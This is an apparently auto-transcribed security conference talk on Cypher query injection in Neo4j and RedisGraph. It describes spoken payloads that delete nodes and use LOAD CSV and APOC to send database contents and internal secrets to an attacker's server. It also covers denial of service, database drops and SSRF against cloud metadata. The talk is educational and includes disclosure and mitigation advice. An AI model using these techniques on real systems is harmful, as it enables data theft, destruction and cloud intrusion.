Cypher Query Injection - the new "SQL Injection" we aren't aware of by Noy Pearl

[Music] uh [Applause] [Music] [Applause] okay uh thank you for the introduction by the way okay i'll just test the clicker because i have luck okay i have luck today i hope hi everyone my name is noe and i'm super excited to be right here first of all i want to thank everyone who actually stayed up until now i really appreciate it i know that's like a difficult challenge um today i'm going to talk about cipher injection so my name is noe and basically i started this research like one year ago and i just googled for cipher injections and i find found like one and a half articles about it and i was like what but we can't have an

injection so my whole goal today is that like half a year from now everyone in this audience will be able to just publish a write-up of bad bounty of cypher injection that's it so basically we're going to talk about what is exactly uh you don't really have to know what sql injection is but just to make sure this is not about sql injection there is one slide about it this is about safer injection so let's start so i'm working as a security researcher i was one of the members in the group of tom rezait who created capture deflect challenges and i really like to research stuff and to learn about new stuff and i also

really like to dance especially after i find the vulnerability and i have like the best dog ever in my opinion but it's more accurate to say that he actually owns me okay so i want you to actually have five takeaways out of this stock today i really want each one of one of you to know what is cipher and what are graph databases i want you to actually be able to inject into those graph databases and to be able to escalate your attack even further than that to cause as many damage as you can or as many damage as i possibly could during my research i really want you to understand how to protect from these kind of injections

and also how to minimize the attack surface in case you have an injection like that and eventually not only the talk i also want to give you some tools to understand what you do right now i wrote some cool playground which i really want you to use it but we have a lot to talk about so let's start cypher so forget for 40 minutes about everything you know about the word cipher we're not talking about scissor cipher or any cipher of crypto we're talking about something different we're talking about opencipher now this is just a query language that you use so you write queries in cipher language and those queries are written to graph databases so they perform some actions

on graph databases and this is basically how you use it so no sql again only cipher right here and whenever i say cipher query injection i'm saying whenever i say cipher i actually mean open cipher um so let's proceed i really wanted to understand what is graph database because i said these two words too many times up until now so let's take for example relational database we have those tables and rows and columns that you're already familiar with and we have graph database now there is a circle you can call it a node and there is an arrow between two nodes you can call it a relationship so there is actually you can release that spongebob

lives at pineapple house um and this is just how the database looks like no rows no tables and if you look at the bottom right you can see that there is neo4j this is one of the biggest companies that use graph database nowadays there is reduced graph which is just an extension of cipher you can actually write cypher queries that perform actions on radius database and there is also amazon neptune which also supports cipher query so it's pretty cool and there are much more databases that nowadays starting to support cypher and neo4j actually open sourced cipher and they actually made this open cipher so whenever i say opencipher i actually mean cypher query okay so we talked about graph databases

and basically what is safer but we want to know much more about cipher and again this is not sql this is cypher this is something that is pretty new to most of us so in order to um do this i just created the word of spongebob in a database and you can see right here that there are notes of characters such as mr crab and spongebob and there are notes of places such as krustykrab senis freedom chum bucket and this is how a graph database actually looks like so you can see that for example if we take spongebob who is a friend of sandy who lives at sunny stream this is just a relationship between those nodes

and basically this is how we actually see those graph databases so we talked about how it looks like about that it's not like table but let's understand and dig into the actual interest in terms of cipher or even of graph databases so we talked about nodes and relationship already we can have an arrow between two nodes and the direction doesn't really matter in our case in all of this talk and at the bottom you can see some query dismiss match and return for a second there is a variable that you can actually defined in your cipher query you can call it c right here there are labels that you can use so there is character label

some like a type of a node and there are properties you can actually assign to nodes so you can assign name and age and birthday to spongebob's node and basically that's it those are the basic terms of cipher now if we look at a query example of cypher then instead of the select from we have match and return so for example if you want in cypher query to get all the characters then we will write a query to match c variable that will bring back all the notes with the type character and return c we have to use return after mesh so that safer we know what we want to get back from the result of the query

and if you want for example to get a character by a specific name we use the same match and then where clause so for example word see that name equals to spongebob return c so this is like the basic example of how use cipher okay so we talked pretty too much about safer we just want to dig into the actually interesting stuff that most of us came here for the actual attack the actual exploitation um and the leverage of the functionalities let's just start with sql i promise this will be the only slide about sql this is not a sql talk but let's just do a very quick brief about what is sql injection we have an

example right here of a query in sql where we just get all the characters from a database where the name equals to some value imagine that this spongebob value actually comes from the user so that's the user input in this case we'll bring back to the user only the data of spongebob but in the case that the user is actually an attacker instead of spongebob they will insert something like spongebob and double quote and then we'll insert a term that will return true always and two dashes to comment out the rest of the query so what will actually happen right here is that for each one of the rows in the table it will be checked whether the

name is spongebob or whether one equals one and since one equals one we return true regardless of the name we will have this injection we will have this exploit and we'll be able to get other information we shouldn't have gotten so basically this is um just sql injection in nutshell and we're gonna use this knowledge from this slide to actually inject into cypher okay so let's get back into cipher injection we have pretty much similar query but in cipher so we want to get all the characters that have some specific name that we get from the user so the name equals to some user input and in this case there is legitimate user just inputs the spongebob value so

we bring back the node that has the name spongebob pretty much boring let's go into the really interesting part now in cypher instead of spongebob the attacker will insert something like spongebob with single quote and then again we'll insert a term that will return true always and return c with two slashes to comment out the rest of the query so what will happen right here is that we will get not only spongebob node but other nodes as well and we just inserted the injections so notice that all the red background text will be actually the injection and this is what an attacker should probably insert but you can just stop me right now and say

okay we have to know to inject return c we're an attacker from outside we have no idea that there is a variable defined that's called c so how would we know to insert return c as the injection and i will tell you that you're totally right this is an issue that we are going to overcome in a few slides so keep that in mind and let's keep with the injections for now but we're going to solve this issue okay the next thing that an attacker can actually do is to use this injection not only to get other data but to actually be able to tamper with our other data so he or she will insert delete c

and then what will happen is that the actual node will be deleted and this is like pretty similar injection but we don't want to do more damage through all these stock so let's see how we can just delete everything and not only our own poor node what we will insert this is the same example as before but this time we will insert something like this now of this red background text will be the actual injection we will insert again spongebob with scenic guild quotes to end the string and then we'll insert two clauses the first one will be match with all character so we will create a variable called all to get all the labels that

has the character and then we'll insert the little so we will be able to delete all the characters so again we will do two actions right here first of all we will get all the characters and then we will delete all the characters and this will be our injection but we don't see the query i mean i'm returning to the previous question that i avoided we don't actually know that there is a return c i mean we don't know to inject return c we don't know that there is a label called character in the database because we are an attacker from outside we have no idea how the database actually looks like so how can we still be able to inject

something because obviously we have to use this return but still not break the query let's see how we're gonna do it we're gonna exploit three data eventually we're gonna just link data to outside and we're gonna do this by leveraging a very legitimate functionality in neo4j code load csv now again neo4j is just one of the biggest database like graph databases today and if you search for graph databases most changes they will come up like top three or top one so we're gonna use load csv functionality neo4j in order to deal with the issue that we had previously that we're not able to see the query we're gonna use this so let's see how we're gonna use it we have this

functionality and all it does is just importing data from other external csv file so you just want to for example to insert data of 20 000 records you don't type it manually you just use the csv so you will load from this csv manually um and by that you'll be able to use the data like this is very legitimate but what it does is that it enables you to use in the query a method that enables us to actually send a get request to external service and that is huge it means that we can define any service we want and a get request will be sent using our injection now let's see actually how we can use it

but basically we have a case of blind injection right here where we actually able to inject into a query but we're not able to see the actual response that is returned so for that we get help from low tsv so we we use it as a kind of a pipe between the actual database and between our own controlled server so we'll be able to leak data from the injection to outside to us but let's see how we can actually do it so i know this is a lot of text but we actually insert those four lines as the injection dismiss the last line what we actually do here will be to run procedure called db.labels it

actually returns back all the labels in a database to us then we use law csv from and we put our own url to our own server and we will append the label at the end of the url so what will actually be is there will be a get request to our own server with the leaked labels and the two slashes of course at the end of the injection to comment out the rest of the query but this will what we will see if we just use for example burpsuit's collaborator to see the request we will get a request to our own server with the leaked label from the injection from the database and as you can see in the second line the user

agent is actually in neolud csv java which means that the get request was sent directly from the injection that we made with the help of the nice load csv in neo4j so using this technique we can just lick more and more parts of the database now we know that there is a label called character we insert match c character and again all of this will be in the injection and then we'll use load csv from with your own to our own server epoch deck joints will dismiss this for a second but keys will see so keys will actually return all the properties of the character and epoch text joins just to turn transform the list

to a string so we can append it at the end of the url and this is basically what we will return to get back all the properties so we'll be able to link also the name properties outside and for each one of the properties in the database we will get another get request and again it was from low csv neo4j so pretty cool the last thing that we want to link will be actually the values the fun values of spongebob and patrick so we know that there is a label called character we know that there is a property called name we want to link right now c dot name that you see at the end of the second line

we will leak patrick and mr krab with a simple typo i made but basically we will be able to link the values of the actual names and by that even delete what we want because right now we linked anything we wanted from the database and we'd be able to tamper and just exploratory data as we wish so we were able to bypass this issue of not being able to see what we inject but as i said in the beginning we want to cause as many damage as we can during all this stock and it's not enough for us to just destroy the database to delete data we want to do much more so let's see what else we can do we're

going to ask a letter attack and cause dinar of service we're going to prevent access to the database we're going to perform ssrf in rfi and i'm going to explain why it is when we reach to those sites but basically we're going to access sensitive informations files and leak data outside and even access hidden endpoints we're gonna eventually cause lateral movement in such a way that we'll be able to leak other data from other services not only the service that is vulnerable to the injection itself and we're gonna also talk about aws dcp and what else we can leak when we have access to a machine in the cloud itself so we're gonna show how it can do all

those things and eventually we're gonna talk about alternatives to low csv and what we can do in other databases as well and not only in load csv even neo4j okay so the first thing that we can actually do in the injection itself we can call dbms.list connections which will actually return back all the connection ids to us we will put this in the injection itself and we will use loadcsv to leak all the connection ids to us and the next thing will be to either kill a connection or kill a list of connections now the connections are not the simple connections between the user and applications those are actually the powerful connections between the server

and the database itself and if we do so in an automated script imagine that it can just cause enough service on the database and prevent from a lot of queries of legitimate users to be executed now i will say that it really depends on the rows and permissions that you actually have if you have the default role of admin you will be able to do so with a simple injection with low tsv but we're going to talk much more about the rows and permissions basically we can just drop databases so we can link the names of the databases with the load csv trig and then we can just drop a database so we were able to close in our service

on the database we're able to delete data and change data and maybe annoy some users but still it's not enough for us so let's see what else we can do we're gonna perform ssrf right now now ssrf is a web based vulnerability where an attacker actually creates an http request in such a way that is malicious it reaches to through the firewall to the server itself and because of how the request is constructed then either the server sends a request to himself or to another internal server gets the response from it and then returns the response to the attacker so it looks just as if the attacker is actually sitting after the firewall and not

behind it and is able to just manipulate the server into sending a lot of internal requests and access a lot of sensitive files keys and endpoints and we're gonna see how we're gonna do this with load csv this is a pretty simple trick but you can achieve a lot with it so we can actually cause ssrf with low csv and this is an example so what we will actually do we have this same case that we talked about when we actually have an injection in a vulnerable server in neo4j we can just use those csv from but this time we won't use our own server we use the url of another internal server and what we

actually happen right here is that the vulnerable server will send a get request to one of the internal servers that we will define from the load csv from and it's pretty powerful we can access hidden endpoints we can enumerate directories we can use command improved force directories and files that we usually you use in bounty and basically if you want to do something more focused whether we talk about cloud environments or gcp or aws for example in aws there is a service called metadata service which is a service that sits in a static iep and it holds a lot of metadata information about your roles and permissions and with which other machines you can actually communicate

with so what you can actually do here is you can use those csv from to create the metadata service to get a response back and to be able to know to each other machines you can escalate your attack so it's pretty much a lot for example if you see that you have access to query the secret manager of aws then you're able to get a lot of sensitive files and passwords from there and also you can just escalate through one machine and another if you just know that you can communicate with this other machine in the cloud so it's pretty much a lot one fine point to know that in v1 you can do this but in v2 you cannot because

in v2 there is a session that you have to establish between the user that wants to the permission and between the metadata service so you actually have to attach your own token in the header of the request and since we use load csv from right here and we cause a get request we need to actually find a way to attach this token in the header when we send this request to the media service and it's like funny to think you will have a potential ability to decide on the header that will be sent in the request using low csv so i didn't find a way to do so and it's a nice thing to know

why else you should operate upgrade to media service version 2. so we saw basically the concept but let's talk about actually ciphertext what we can do right here is i have a very cringy version of server that holds in some endpoint you should never be able to access externally and hold some very secret um and in this point i'm i'm going to say that this imagine these endpoints actually sits in another server not in the server that actually runs new 4g in the database what we do right here will be all this will be the injection itself again dismiss the last line um but we will use to load csv from right here the first one will be to get the actual

secret value from the other server and as you can see there is a keys.txt at the end we will save this value as secret and then we'll use dot csv from we will use the url to our own server this time with the secret appended at the end so what will actually happen right here is that we will get eventually the secret leaked outside to us and this is a secret that was sitting inside a different server not in the server that we had the injection of so this is kind of an example how we can actually escalate to other machines as well and notice just one thing the secret with the index zero is because we use

load csv so it actually returns as csv file but not really and it doesn't really matter what your type of the file is it will work regardless if it's csv or not okay so we talked about a lot here we talked about cipher injection and graph databases dna of service and other fun stuff with ssrf and escalation in the cloud but i really want to talk for a second about what we actually did after we discovered all those things so we did responsible disclosure we actually contacted neo4j company and told them about all the risks that you can actually have when you have low csv enabled because we didn't find any way to disable load csv and we really wanted

away from them to disable csv if we don't use it so that an attacker won't be able to escalate like that in the cloud they didn't understand the risk and they're working currently to provide a solution but unfortunately since load csv is defined in new 4j as a clause and not as a function currently this is not simple to develop a fix that will be able to to have you disable csv because imagine that you cannot obviously disable match clause so it is actually defined as clause this law csv you can actually disable all the functions in csv but again since slow csv is not a function as it is as it is defined in neo4j then you

cannot actually use it right now but since they're working on installation i was like okay they will fix it some at some point in the future people will be able to disable it i still want to find a way to be able to leak the same information but not with low csv this time and this is where epoch plugin comes into the the picture so i did a little research about what it is exactly this is just a plugin you can install in new 4g and i think it is like the most common plugin in neo4j um and you can obviously use much more features when you install the when you install a plugin so basically

it's just an extension to the language of cipher in neo4j you can just load import and import export other data and what i thought was okay we can actually use apocloud json in a similar way of how we use vote csv so even if low cc will be blocked at some point or another we still have it another way we can use match for example with c corrector and then to call apocaly.json and at the end of this third line in the leaked we will still be able to append the liquid information that we want to to use actually so the same injection we can actually achieve with a different thing with epoch library it has to be

installed in your actual database so an attacker will be able to use it but it's very familiar to a lot of developers that actually use neo4j and it's just as you talk about loadash in javascript for example a lot of people in javascript actually use it and install it so it's pretty common to to assume that they probably install it um and this is just how it looks like when you have your own server and use this injection and you get a request so you get a request with data json with the leaked value and it will send directly from epoch procedures for neo4j okay so we talked a lot about the injections a lot about the risk and

pretty much a lot about what we actually try to do with neo4j but let's really try to make a value out of this stock today and understand how we can be protected from those kind of injections first of all in order to be able to write as a developer query we have to use parameterized queries and this is a good example like we have to use match and every kind of clause but with a parameter inside so you can see the dollar sign of name and we can see that we put the name value in a separate parameter of the function that we run and it actually means that we take the name that we get from the user and use

it in a parameter in cipher so it doesn't matter if the user tries to insert single quote or double quote it will be treated as a parameter in query and it will be mostly escaped so double quote will be treated as if the double quote yeah the double quote character and notice the character that terminates the string so this is what we should do if we develop in graph database and want to avoid injections and this is not so good and you should never do this example of how we actually able to write a query in such a way that is prone to injection we have here a second line string aggregation of the name we just insert

it like that and don't really do any validation so the second crime spongebob will be what he shouldn't do i hope that's clear enough um so okay we talked about remediation but we are pretty realistic today and we know that there can come a time when a new developer will arrive and we will write some vulnerable query that will be injectable so we still want to be able to mitigate our attack surface what we can actually do right here if we talk about neo4j we have role-based access control we have a very large way to actually define different users roles and privileges we can just for example if we have a sensitive database that we

want to read data from and we have other less sensitive database that we want to write to we can use two different users with two different roles one will have only right permissions on the sensitive database and second will be read read and write permissions on the less sensitive so that if there will be an injection in this sensitive database an attacker will be able only to read and not to write to it or to update and you have kind of really nice granola rolls in neo4j so every row is built on the top of the previous row with a few more rows with with a few more permissions and you can actually if you want to be

more protected revoke some privileges from rows for example you can use some role such as editor and then revoke all the permissions to execute functions and procedures on this specific role so just to harden it and eventually i really had to add a point about it because i think it's cool uh we actually got a suggestion from neo4j regarding epoch procedures from version 4.3 yeah 4.3 we can actually have a block list of any apoc procedures we want so we can actually define in the configuration of neo4j a block list of apple cloud and epoc import for example and if we actually don't use epoch we can just uninstall it and by that prevent this kind of scenario

okay so i really want to say something about reduced graph so where this graph is an extension to redis that enables you to write cipher queries and i really try to dig into the documentation to understand what you can actually do with it if you have an equivalent of load csv with it i found out that there are parameterized queries there is a support in parameters queries so that's great and i found that there is support in some procedures db dot labels it can help you if you also want to achieve an injection in this graph and regarding low csv i didn't find load csv in redis graph but i didn't find case when you can use it as a kind of an

if based with substring so you can for example get the labels using dividend labels and check whether the first letter of the first label equals a and combine this with or one equals two and see the result or see an arrow or c and decide whether regarding the actual response value of the query so you can actually achieve this with redux graph and when i try to dig into redis graph more deeply and try to really understand if we have any way to have rows and permissions in a similar way of neo4j i came across this question i have no idea who this person is but from it's from 2021 a person just begged to have some kind of arbuck like we have

in neo4j and i really tried to understand whether or not this was answered because i didn't find any reference of having row-based access control in radius graph so i didn't find any maybe there is but i really didn't find any access control that you have in in this graph okay so we talked a lot about injections cipher graph databases dna of service ssrf reduced graph also and mitigation and remediation but i really want you to have value out of this talk as i said and not only see those i hope nice slides i really want you to understand how the injections work so what i did i created a playground in cypher i will put also i

yeah i put a qr code at the end so you don't really need to um to type it right now but i really want you to actually clone it it is all docker composerized and it just starts up a neo4j database with data and redis graph and has a nice swagger and postman collections and just play it try to understand how it works and then either fix existing injections if you're some security engineer or research or just start bug bounty so you can actually hunt for bugs in cypher i didn't find any bug bounty write-up about cipher and i hope that like half a month from now it will be much different it would be really

awesome it if it would be that different and eventually you can just use the remediation some mitigation that we talked about if you just some security engineer or you can just profit from learning and understanding about another thing that maybe you didn't know before also if you're just security enthusiasts and wants to do this um safer playground though also go ahead i want to to give credit to a person that i i found this blog like one year ago and this is the part of the low csv the cool trick and this person also wrote um kind of like the basic um github project that i based my playground on so thank you for that

and that's all so thank you everyone [Applause] thank you so much i would like to say that yeah this qr code it's obvious but i still want to say it this qr code actually is the yeah cypher playground at the bottom please feel free to talk with me to tell me what you think tell me about it you tell me about the playground and it would be awesome if we just find more articles and write-ups up from now about cipher so thank you everyone [Applause] thank you [Applause] [Music] [Applause]